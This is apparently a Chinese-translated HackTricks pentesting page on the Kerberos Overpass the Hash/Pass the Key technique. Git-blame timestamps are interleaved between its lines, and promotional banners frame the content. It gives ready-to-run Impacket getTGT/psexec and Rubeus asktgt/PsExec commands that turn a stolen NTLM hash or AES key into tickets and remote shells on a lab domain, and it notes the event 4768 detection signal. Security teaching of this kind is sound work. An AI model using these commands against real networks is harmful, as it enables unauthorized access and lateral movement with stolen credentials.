2024-02-07 04:49:09 +00:00
# Over Pass the Hash/Pass the Key
2022-04-28 16:01:33 +00:00
< details >
2024-02-09 02:09:47 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, 成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-09 02:09:47 +00:00
* 您在**网络安全公司**工作吗? 想要看到您的**公司在HackTricks中做广告**吗? 或者想要访问**PEASS的最新版本或下载HackTricks的PDF**吗? 请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 发现我们的独家[NFT收藏品**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord群** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群** ](https://t.me/peass ) 或在**Twitter**上关注我 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享您的黑客技巧**。
2022-04-28 16:01:33 +00:00
< / details >
2024-02-07 04:49:09 +00:00
## Overpass The Hash/Pass The Key (PTK)
2020-07-15 15:43:14 +00:00
2024-02-08 03:56:12 +00:00
**Overpass The Hash/Pass The Key (PTK)**攻击旨在针对传统NTLM协议受限且Kerberos认证优先的环境。该攻击利用用户的NTLM哈希或AES密钥来获取Kerberos票据, 从而未经授权地访问网络中的资源。
2020-07-15 15:43:14 +00:00
2024-02-08 03:56:12 +00:00
要执行此攻击, 初始步骤涉及获取目标用户帐户的NTLM哈希或密码。在获得此信息后, 可以获取帐户的票据授予票据( TGT) , 使攻击者能够访问用户具有权限的服务或机器。
可以使用以下命令启动该过程:
```bash
2020-07-15 15:43:14 +00:00
python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass
```
2024-02-08 03:56:12 +00:00
在需要AES256的情况下, 可以利用`-aesKey [AES key]`选项。此外, 获取的票据可以与各种工具一起使用, 包括smbexec.py或wmiexec.py, 从而扩大攻击范围。
2020-07-15 15:43:14 +00:00
2024-02-09 02:09:47 +00:00
遇到诸如_PyAsn1Error_或_KDC无法找到名称_等问题通常可以通过更新Impacket库或使用主机名代替IP地址来解决, 确保与Kerberos KDC兼容。
2020-07-15 15:43:14 +00:00
2024-02-08 03:56:12 +00:00
使用Rubeus.exe的另一种命令序列展示了这种技术的另一个方面:
```bash
2020-07-15 15:43:14 +00:00
.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd
```
2024-02-09 02:09:47 +00:00
这种方法与**Pass the Key**方法类似, 重点是挪用并直接利用票证进行身份验证。值得注意的是, TGT请求的启动会触发事件`4768: A Kerberos authentication ticket (TGT) was requested`, 默认情况下表示使用RC4-HMAC, 尽管现代Windows系统更倾向于AES256。
2022-08-13 23:06:40 +00:00
2024-02-08 03:56:12 +00:00
为了符合运行安全性并使用AES256, 可以应用以下命令:
2022-08-13 23:06:40 +00:00
```bash
.\Rubeus.exe asktgt /user:< USERNAME > /domain:< DOMAIN > /aes256:HASH /nowrap /opsec
```
2023-08-03 19:12:22 +00:00
## 参考资料
2022-04-28 16:01:33 +00:00
2022-10-04 14:07:17 +00:00
* [https://www.tarlogic.com/es/blog/como-atacar-kerberos/ ](https://www.tarlogic.com/es/blog/como-atacar-kerberos/ )
2022-04-28 16:01:33 +00:00
2022-10-04 14:07:17 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-02-09 02:09:47 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, 成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-09 02:09:47 +00:00
* 您在**网络安全公司**工作吗? 想要看到您的**公司在HackTricks中宣传**吗? 或者想要访问**PEASS的最新版本或下载HackTricks的PDF**? 请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 发现我们的独家[NFT收藏品**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord群** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群** ](https://t.me/peass ) 或在**Twitter**上关注我 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
2024-02-07 04:49:09 +00:00
* **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享您的黑客技巧**。
2022-04-28 16:01:33 +00:00
< / details >